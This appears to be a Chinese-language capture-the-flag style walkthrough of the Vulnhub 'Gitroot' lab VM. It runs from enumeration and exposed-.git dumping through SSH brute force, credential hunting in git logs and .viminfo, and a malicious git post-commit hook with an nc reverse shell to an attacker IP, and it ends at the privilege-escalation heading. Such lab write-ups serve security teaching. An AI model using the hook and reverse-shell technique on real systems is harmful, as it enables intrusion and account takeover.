Vulnhub之Gigroot靶机详细测试过程

Gigroot

识别目标主机IP地址

1. ─(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
3. Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                         
5. 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
6. _____________________________________________________________________________
7.    IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
8. -----------------------------------------------------------------------------
9. 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor                                                            
10. 192.168.56.100  08:00:27:ab:4c:5b      1      60  PCS Systemtechnik GmbH                                                   
11. 192.168.56.103  08:00:27:44:c8:1b      1      60  PCS Systemtechnik GmbH

复制代码

利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.103
NMAP扫描

1. ┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ sudo nmap -sS -sV -sC -p- 192.168.56.103 -oN nmap_full_scan
3. Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 22:08 EDT
4. Nmap scan report for localhost (192.168.56.103)
5. Host is up (0.000075s latency).
6. Not shown: 65532 closed tcp ports (reset)
7. PORT      STATE SERVICE   VERSION
8. 22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
9. | ssh-hostkey:
10. |   2048 bf45f6b3e3ce0c69185a5b27e5d39c86 (RSA)
11. |   256 b5d7455006c4e23c2852b806261fdeb0 (ECDSA)
12. |_  256 27f0d02113309c5ef070a1d85ca78f75 (ED25519)
13. 80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
14. |_http-title: Hey Jen
15. |_http-server-header: Apache/2.4.38 (Debian)
16. 11211/tcp open  memcache?
17. | fingerprint-strings:
18. |   RPCCheck:
19. |_    Unknown command
20. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
21. SF-Port11211-TCP:V=7.93%I=7%D=4/29%Time=644DCDBD%P=x86_64-pc-linux-gnu%r(R
22. SF:PCCheck,27,"\x81\0\0\0\0\0\0\x81\0\0\0\x0f\0\0\0\x02\0\0\0\0\0\0\0\0Unk
23. SF:nown\x20command");
24. MAC Address: 08:00:27:44:C8:1B (Oracle VirtualBox virtual NIC)
25. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
27. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
28. Nmap done: 1 IP address (1 host up) scanned in 85.92 seconds

复制代码

NMAP扫描结果表明目标主机有3个开放端口：22(ssh)、80(http)、11211（?)
获得Shell

1. ┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ curl http://192.168.56.103/                                                                     
3. <!doctype html>
4. <html>
5.         <head>
6.                 <title>Hey Jen</title>
7.                 </head>
10.         <body>
11.                 <p> Hey Jen, just installed wordpress over at wp.gitroot.vuln <br> please go check it out! <p>
12.         </body>
13. </html>

复制代码

将wp.gitroot.vuln加入/etc/hosts文件中：

1. ┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ sudo vim /etc/hosts                                       
4. ┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
5. └─$ cat /etc/hosts            
6. 127.0.0.1       localhost
7. 127.0.1.1       kali
8. ::1             localhost ip6-localhost ip6-loopback
9. ff02::1         ip6-allnodes
10. ff02::2         ip6-allrouters
11. 192.168.56.103  wp.gitroot.vuln

复制代码

此时访问url,从返回页面可知目标为Wordpress站点:

1. http://wp.gitroot.vuln/

复制代码

1. ┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ nikto -h http://wp.gitroot.vuln/
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.103
6. + Target Hostname:    wp.gitroot.vuln
7. + Target Port:        80
8. + Start Time:         2023-04-29 22:24:21 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.38 (Debian)
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + Uncommon header 'link' found, with contents: <http://wp.gitroot.vuln/index.php?rest_route=/>; rel="https://api.w.org/"
14. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
15. + No CGI Directories found (use '-C all' to force check all possible dirs)
16. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
17. + OSVDB-3092: /manual/: Web server manual found.
18. + OSVDB-3268: /manual/images/: Directory indexing found.
19. + OSVDB-3233: /icons/README: Apache default file found.
20. + /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
21. + /wp-links-opml.php: This WordPress script reveals the installed version.
22. + /: A Wordpress installation was found.
23. + Cookie wordpress_test_cookie created without the httponly flag
24. + /wp-login.php: Wordpress login found
25. + 7863 requests: 0 error(s) and 13 item(s) reported on remote host
26. + End Time:           2023-04-29 22:25:11 (GMT-4) (50 seconds)
27. ---------------------------------------------------------------------------
28. + 1 host(s) tested
31.       *********************************************************************
32.       Portions of the server's headers (Apache/2.4.38) are not in
33.       the Nikto 2.1.6 database or are newer than the known string. Would you like
34.       to submit this information (*no server specific data*) to CIRT.net
35.       for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

复制代码

1. ──(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ gobuster dir -u http://wp.gitroot.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh,.bak
3. ===============================================================
4. Gobuster v3.3
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://wp.gitroot.vuln/
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.3
13. [+] Extensions:              html,txt,sh,bak,php,js
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/04/29 22:25:59 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.php                 (Status: 403) [Size: 280]
19. /.html                (Status: 403) [Size: 280]
20. /index.php            (Status: 301) [Size: 1] [--> http://wp.gitroot.vuln/]
21. /wp-content           (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/wp-content/]
22. /wp-login.php         (Status: 200) [Size: 3195]
23. /manual               (Status: 301) [Size: 319] [--> http://wp.gitroot.vuln/manual/]
24. /wp-includes          (Status: 301) [Size: 324] [--> http://wp.gitroot.vuln/wp-includes/]
25. /wp                   (Status: 403) [Size: 280]
26. /javascript           (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/javascript/]
27. /readme.html          (Status: 200) [Size: 7440]
28. /wp-trackback.php     (Status: 200) [Size: 136]
29. /wp-admin             (Status: 301) [Size: 321] [--> http://wp.gitroot.vuln/wp-admin/]
30. /xmlrpc.php           (Status: 405) [Size: 43]
31. /.php                 (Status: 403) [Size: 280]
32. /.html                (Status: 403) [Size: 280]
33. /wp-signup.php        (Status: 302) [Size: 1] [--> http://wp.gitroot.vuln/wp-login.php?action=register]
34. /server-status        (Status: 403) [Size: 280]
35. Progress: 1540385 / 1543927 (99.77%)===============================================================
36. 2023/04/29 22:29:10 Finished
37. ============================================================

复制代码

因为我们已知目标运行wordpress站点，因此从gobuster和nikto工具运行结果中没有看到除了wordpress相关的目录文件之外的信息。接下来看是否可以用wpscan工具扫描出用户名或者可利用的插件。

1. ─(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ wpscan --url http://wp.gitroot.vuln/ -e u,p
3. [+] beth
4. | Found By: Author Posts - Display Name (Passive Detection)
5. | Confirmed By:
6. |  Rss Generator (Passive Detection)
7. |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
8. |  Login Error Messages (Aggressive Detection)

复制代码

wpscan工具扫描出用户名beth,看能否破解其密码。

1. (kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ wpscan --url http://wp.gitroot.vuln/ -U beth -P /usr/share/wordlists/rockyou.txt

复制代码

没有破解出用户beth的密码，那看下可否扫描出插件。

1. ─(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ wpscan --url http://wp.gitroot.vuln/ --plugins-detection mixed

复制代码

虽然扫描出插件akismet，但是该插件没有漏洞可利用。
会不会存在其他子域名？
将gitroot.vuln加入到/etc/hosts文件后，用wfuzz工具爆破子域名

1. ┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ wfuzz -c -u http://gitroot.vuln -H "Host:FUZZ.gitroot.vuln" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 26
3. /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
4. ********************************************************
5. * Wfuzz 3.1.0 - The Web Fuzzer                         *
6. ********************************************************
8. Target: http://gitroot.vuln/
9. Total requests: 220560
11. =====================================================================
12. ID           Response   Lines    Word       Chars       Payload                                                      
13. =====================================================================
15. 000000001:   400        12 L     53 W       422 Ch      "# directory-list-2.3-medium.txt"                           
16. 000000003:   400        12 L     53 W       422 Ch      "# Copyright 2007 James Fisher"                              
17. 000000007:   400        12 L     53 W       422 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3
18.                                                         .0/"                                                         
19. 000000012:   400        12 L     53 W       422 Ch      "# on at least 2 different hosts"                           
20. 000000013:   400        12 L     53 W       422 Ch      "#"                                                         
21. 000000011:   400        12 L     53 W       422 Ch      "# Priority ordered case-sensitive list, where entries were f
22.                                                         ound"                                                        
23. 000000010:   400        12 L     53 W       422 Ch      "#"                                                         
24. 000000009:   400        12 L     53 W       422 Ch      "# Suite 300, San Francisco, California, 94105, USA."        
25. 000000002:   400        12 L     53 W       422 Ch      "#"                                                         
26. 000000008:   400        12 L     53 W       422 Ch      "# or send a letter to Creative Commons, 171 Second Street,"
27. 000000005:   400        12 L     53 W       422 Ch      "# This work is licensed under the Creative Commons"         
28. 000000006:   400        12 L     53 W       422 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of thi
29.                                                         s"                                                           
30. 000000004:   400        12 L     53 W       422 Ch      "#"                                                         
31. 000000793:   200        131 L    578 W      10697 Ch    "wp"                                                         
32. 000002024:   400        12 L     53 W       422 Ch      "'"                                                         
33. 000003790:   400        12 L     53 W       422 Ch      "%20"                                                        
34. 000005302:   400        12 L     53 W       422 Ch      "$FILE"                                                      
35. 000005954:   400        12 L     53 W       422 Ch      "$file"                                                      
36. 000007004:   400        12 L     53 W       422 Ch      "*checkout*"                                                
37. 000012898:   200        21 L     51 W       438 Ch      "repo"

复制代码

发现出repo子域名，将其加入到/etc/hosts文件中去：

1. ┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ cat /etc/hosts
3. 127.0.0.1       localhost
4. 127.0.1.1       kali
5. ::1             localhost ip6-localhost ip6-loopback
6. ff02::1         ip6-allnodes
7. ff02::2         ip6-allrouters
8. 192.168.56.103  wp.gitroot.vuln
9. 192.168.56.103  gitroot.vuln
10. 192.168.56.103  repo.gitroot.vuln

复制代码

利用浏览器访问子域名repo，此次返回内容为：

1. ┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ curl http://repo.gitroot.vuln/
3. <!doctype html
5. <html>
6. <head>
8.     <title>Code storage</title>
9. </head>
10.   
11. <body>
13.         <h1 >Welcome to our code storage area, we are currently storing a bunch of code here</h1>
14.         <p >Feel free to search our code base at get.php or set code in set.php </p>
15. </body>
17. </html>

复制代码

用gobuster工具没有扫描出上述子域名下更有价值的文件或者目录

1. ┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ gobuster dir -u http://repo.gitroot.vuln -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.bak,.txt,.js
3. ===============================================================
4. Gobuster v3.3
5. by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6. ===============================================================
7. [+] Url:                     http://repo.gitroot.vuln
8. [+] Method:                  GET
9. [+] Threads:                 10
10. [+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
11. [+] Negative Status codes:   404
12. [+] User Agent:              gobuster/3.3
13. [+] Extensions:              php,html,sh,bak,txt,js
14. [+] Timeout:                 10s
15. ===============================================================
16. 2023/04/30 06:07:55 Starting gobuster in directory enumeration mode
17. ===============================================================
18. /.html                (Status: 403) [Size: 282]
19. /index.php            (Status: 200) [Size: 438]
20. /.php                 (Status: 403) [Size: 282]
21. /stats.php            (Status: 200) [Size: 2911]
22. /manual               (Status: 301) [Size: 323] [--> http://repo.gitroot.vuln/manual/]
23. /get.php              (Status: 200) [Size: 144]
24. /javascript           (Status: 301) [Size: 327] [--> http://repo.gitroot.vuln/javascript/]
25. /set.php              (Status: 200) [Size: 151]
26. /.php                 (Status: 403) [Size: 282]
27. /.html                (Status: 403) [Size: 282]
28. /server-status        (Status: 403) [Size: 282]
29. Progress: 1542281 / 1543927 (99.89%)===============================================================
30. 2023/04/30 06:11:15 Finished
31. ===============================================================

复制代码

nikto工具结果表明该子域名存在/.git目录，用githack工具将repo的文件clone到Kali Linux本地

1. ──(kali㉿kali)-[~/Vulnhub/Gigroot]
2. └─$ nikto -h http://repo.gitroot.vuln
3. - Nikto v2.1.6
4. ---------------------------------------------------------------------------
5. + Target IP:          192.168.56.103
6. + Target Hostname:    repo.gitroot.vuln
7. + Target Port:        80
8. + Start Time:         2023-04-30 06:11:29 (GMT-4)
9. ---------------------------------------------------------------------------
10. + Server: Apache/2.4.38 (Debian)
11. + The anti-clickjacking X-Frame-Options header is not present.
12. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
13. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
14. + No CGI Directories found (use '-C all' to force check all possible dirs)
15. + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
16. + OSVDB-3092: /manual/: Web server manual found.
17. + OSVDB-3268: /manual/images/: Directory indexing found.
18. + OSVDB-3233: /icons/README: Apache default file found.
19. + OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
20. + /.git/HEAD: Git HEAD file found. Full repo details may be present.
21. + /.git/config: Git config file found. Infos about repo details may be present.
22. + 7863 requests: 0 error(s) and 10 item(s) reported on remote host
23. + End Time:           2023-04-30 06:12:20 (GMT-4) (51 seconds)
24. ---------------------------------------------------------------------------
25. + 1 host(s) tested
28.       *********************************************************************
29.       Portions of the server's headers (Apache/2.4.38) are not in
30.       the Nikto 2.1.6 database or are newer than the known string. Would you like
31.       to submit this information (*no server specific data*) to CIRT.net
32.       for a Nikto update (or you may email to sullo@cirt.net) (y/n)?

复制代码

1. ┌──(kali㉿kali)-[~/Toolsets/GitHack]
2. └─$ python GitHack.py http://repo.gitroot.vuln/.git/
3. [+] Download and parse index file ...
4. [+] 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
5. [+] get.php
6. [+] index.php
7. [+] pablo_HELP.txt
8. [+] set.php
9. [+] stats.php
10. [OK] get.php
11. [OK] index.php
12. [OK] 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
13. [OK] pablo_HELP.txt
14. [OK] set.php
15. [OK] stats.php

复制代码

先看能否破解pablo的密码

1. ┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
2. └─$ cat pablo_HELP.txt
3. I need help, something is wrong with this git repo
5. ┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
6. └─$ cat 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
7. pablo_S3cret_P@ss
8. beth_S3cret_P@ss
9. jen_S3cret_P@ss

复制代码

密码为mastergitar

1. ─(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
2. └─$ hydra -l pablo -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.103     

复制代码

1. ┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
2. └─$ ssh pablo@192.168.56.103                                       
3. The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
4. ED25519 key fingerprint is SHA256:60rNw8fczihsSqs64B1Lf2E1VkCGOsuq8BTev2ELwLw.
5. This key is not known by any other names.
6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7. Warning: Permanently added '192.168.56.103' (ED25519) to the list of known hosts.
8. pablo@192.168.56.103's password:
9. Linux GitRoot 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
11. The programs included with the Debian GNU/Linux system are free software;
12. the exact distribution terms for each program are described in the
13. individual files in /usr/share/doc/*/copyright.
15. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
16. permitted by applicable law.
17. Last login: Tue May 26 01:30:55 2020 from 192.168.56.1
18. pablo@GitRoot:~$ id
19. uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)
20. pablo@GitRoot:~$ ls -alh
21. total 32K
22. drwxr-xr-x 4 pablo pablo 4.0K May 26  2020 .
23. drwxr-xr-x 5 root  root  4.0K May 26  2020 ..
24. lrwxrwxrwx 1 pablo pablo    9 May 26  2020 .bash_history -> /dev/null
25. -rw-r--r-- 1 pablo pablo  220 May 25  2020 .bash_logout
26. -rw-r--r-- 1 pablo pablo 3.5K May 25  2020 .bashrc
27. drwx------ 3 pablo pablo 4.0K May 25  2020 .gnupg
28. -rw-r--r-- 1 pablo pablo  807 May 25  2020 .profile
29. drwx-wx-wx 2 pablo pablo 4.0K May 25  2020 public
30. -rw-r--r-- 1 root  root   871 May 26  2020 user.txt
31. pablo@GitRoot:~$ cat user.txt
33.   _______ _                 _                          _____      _     _      
34. |__   __| |               | |                        |  __ \    | |   | |     
35.     | |  | |__   __ _ _ __ | | __  _   _  ___  _   _  | |__) |_ _| |__ | | ___  
36.     | |  | '_ \ / _` | '_ \| |/ / | | | |/ _ \| | | | |  ___/ _` | '_ \| |/ _ \
37.     | |  | | | | (_| | | | |   <  | |_| | (_) | |_| | | |  | (_| | |_) | | (_)
38.     |_|  |_| |_|\__,_|_| |_|_|\_\  \__, |\___/ \__,_| |_|   \__,_|_.__/|_|\___/
39.                                     __/ |                                       
40.                                    |___/                                       
44. Great job! Do not falter, there is more to do. You made it this far, finish the race!
46. "It's not that I'm so smart. Its just that I stay with problems longer." - Albert Einstein
48. 8a81007ea736a2b8a72a624672c375f9ac707b5e
49. pablo@GitRoot:~$

复制代码

需要找出另外一个git仓库
将linpeas.sh脚本上传至目标主机站点：

1. pablo@GitRoot:~/public$ ls -alh
2. total 12K
3. drwx-wx-wx 2 pablo pablo 4.0K May 25  2020 .
4. drwxr-xr-x 4 pablo pablo 4.0K May 26  2020 ..
5. -rw-r--r-- 1 beth  beth    58 May 25  2020 message.txt
6. pablo@GitRoot:~/public$ cat message.txt
7. Hey pablo
9. Make sure to check-out our brand new git repo!

复制代码

发现了一个新的git仓库：drwxr-xr-x 8 beth beth 4096 May 26  2020 /opt/auth/.git
进入该目录查看

1. ══════════╣ Analyzing Github Files (limit 70)
3. -rw-r--r-- 1 jen jen 50 May 26  2020 /home/jen/.gitconfig
6. drwxr-xr-x 8 beth beth 4096 May 26  2020 /opt/auth/.git
7. drwxr-xr-x 8 root root 4096 May 25  2020 /var/www/repo/.git

复制代码

该目录下有很多文件，但是用sort命令查看，其中文件dev-43的大小不一样。

1. pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ ls -alh | sort -n -r
2. total 804K
3. -rw-r--r-- 1 beth beth  595 May 26  2020 dev-43
4. -rw-r--r-- 1 beth beth  445 May 26  2020 dev-199
5. -rw-r--r-- 1 beth beth  443 May 26  2020 dev-99
6. -rw-r--r-- 1 beth beth  443 May 26  2020 dev-98

复制代码

发现了一个密码：r3vpdmspqdb, 很显然，因为新的.git目录属主是beth，因此该密码应该也是属于beth
切换到用户beth

1. pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ cat dev-43
2. 0000000000000000000000000000000000000000 fc9901f3b6b303d6ad40cdb71689f1646904f7b3 Your Name <you@example.com> 1590499965 -0400branch: Created from HEAD
3. fc9901f3b6b303d6ad40cdb71689f1646904f7b3 b2ab5f540baab4c299306e16f077d7a6f6556ca3 Your Name <you@example.com> 1590500014 -0400commit: init repo
4. b2ab5f540baab4c299306e16f077d7a6f6556ca3 06fbefc1da56b8d552cfa299924097ba1213dd93 Your Name <you@example.com> 1590500148 -0400commit: added some stuff
5. 06fbefc1da56b8d552cfa299924097ba1213dd93 aaa283c708d79c692797339434664f4ba7accb25 Your Name <you@example.com> 1590500197 -0400commit: init repo
6. pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ git show 06fbefc1da56b8d552cfa299924097ba1213dd93
7. commit 06fbefc1da56b8d552cfa299924097ba1213dd93
8. Author: Your Name <you@example.com>
9. Date:   Tue May 26 09:35:48 2020 -0400
11.     added some stuff
13. diff --git a/main.c b/main.c
14. index 70e6397..8af9b9c 100644
15. --- a/main.c
16. +++ b/main.c
17. @@ -4,6 +4,15 @@
18. int main(){
20.          char pass[20];
21. -       return 0;
22. +        scanf("%20s", pass);
23. +        printf("You put %s\n", pass);
24. +        if (strcmp(pass, "r3vpdmspqdb") == 0 ){
25. +                char *cmd[] = { "bash", (char *)0 };
26. +                execve("/bin/bash", cmd, (char *) 0);
27. +        }
28. +        else{
29. +                puts("BAD PASSWORD");
30. +        }
31. +        return 0;
32. }
33. -//43
34. +
35. (END)

复制代码

在beth目录下，新建.git/hooks文件夹，建一个post-commit文件，里面写入使用nc反弹shell的一句话，文件给777权限，再将.git文件夹压缩成zip格式，再给777权限

1. pablo@GitRoot:~$ su - beth
2. Password:
3. beth@GitRoot:~$
4. beth@GitRoot:~$ ls -alh
5. total 28K
6. drwxr-xr-x 5 beth beth 4.0K May 26  2020 .
7. drwxr-xr-x 5 root root 4.0K May 26  2020 ..
8. lrwxrwxrwx 1 beth beth    9 May 26  2020 .bash_history -> /dev/null
9. -rw-r--r-- 1 beth beth    0 May 25  2020 .bash_logout
10. -rw-r--r-- 1 beth beth 3.5K May 26  2020 .bashrc
11. drwx------ 3 beth beth 4.0K May 26  2020 .gnupg
12. drwxr-xr-x 3 beth beth 4.0K May 25  2020 .local
13. -rw-r--r-- 1 beth beth  807 May 26  2020 .profile
14. drwx-wx-wx 2 beth beth 4.0K May 26  2020 public

复制代码

复制压缩包到/home/jen/public/repos目录下

1. beth@GitRoot:~$ mkdir -p .git/hooks
2. beth@GitRoot:~$ cd .git/hooks/
3. beth@GitRoot:~/.git/hooks$ vim post-commit
4. beth@GitRoot:~/.git/hooks$ cat post-commit
5. #!/bin/bash
6. nc -e /bin/bash 192.168.56.206 6666
7. beth@GitRoot:~/.git/hooks$ chmod 777 post-commit
8. beth@GitRoot:~/.git/hooks$ cd ~
9. beth@GitRoot:~$ 7z a xshell.zip  .git/
11. 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
12. p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Core(TM) i7-9700 CPU @ 3.00GHz (906ED),ASM,AES-NI)
14. Scanning the drive:
15. 2 folders, 1 file, 48 bytes (1 KiB)
17. Creating archive: xshell.zip
19. Items to compress: 3
22. Files read from disk: 1
23. Archive size: 482 bytes (1 KiB)
24. Everything is Ok
25. beth@GitRoot:~$ chmod 777 xshell.zip
26. beth@GitRoot:~$

复制代码

1. beth@GitRoot:~$ chmod 777 xshell.zip
2. beth@GitRoot:~$ cp xshell.zip /home/jen/public/repos

复制代码

jen的密码是binzpbeocnexoe
提权

1. jen@GitRoot:~$ cat .viminfo
2. cat .viminfo
3. # This viminfo file was generated by Vim 8.1.
4. # You may edit it if you're careful!
6. # Viminfo version
7. |1,4
9. # Value of 'encoding' when this file was written
10. *encoding=utf-8
13. # hlsearch on (H) or off (h):
14. ~h
15. # Command Line History (newest to oldest):
16. :wq
17. |2,0,1590471909,,"wq"
18. :q!
19. |2,0,1590471893,,"q!"
20. :Q!
21. |2,0,1590471892,,"Q!"
23. # Search String History (newest to oldest):
24. ?/binzpbeocnexoe
25. |2,1,1590471908,47,"binzpbeocnexoe"

复制代码

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！